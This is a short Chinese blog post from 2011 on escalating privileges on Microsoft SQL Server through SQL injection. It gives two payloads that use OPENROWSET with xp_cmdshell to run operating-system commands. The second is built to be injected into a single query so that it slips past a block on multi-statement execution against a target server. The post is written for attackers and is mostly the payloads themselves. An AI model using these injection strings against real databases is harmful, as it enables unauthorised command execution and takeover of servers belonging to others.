遇到SA权限不能多句执行的情况,语句提权。

有时候会遇到SA权限不能多句执行的情况,让人很蛋疼。
前几天在搞一个SQL SERVER 7.0的PUBLIC权限时。
某牛给我以下语句提权

select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:''')


本机测试成功。
但实际环境中却出现[微软] [ODBC SQL Server驱动] [SQL Server中] OLE DB提供程序'sqloledb'无法创建一个接口 的错误。原因不明,还望哪位大牛解释。。

虽然这个问题偶还没有解决,但今天遇到一个SA权限不能多句的情况(估计驱动问题,不解),让我蛋疼了一段时间。
后来经过GOOGLE,发现SA权限还可以这样执行。

and 0<>(select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:'''))


这样就绕过了多句执行的限制了。 

posted @ 2011-04-19 07:57  WHaa_(T_T)  阅读(241)  评论(0编辑  收藏  举报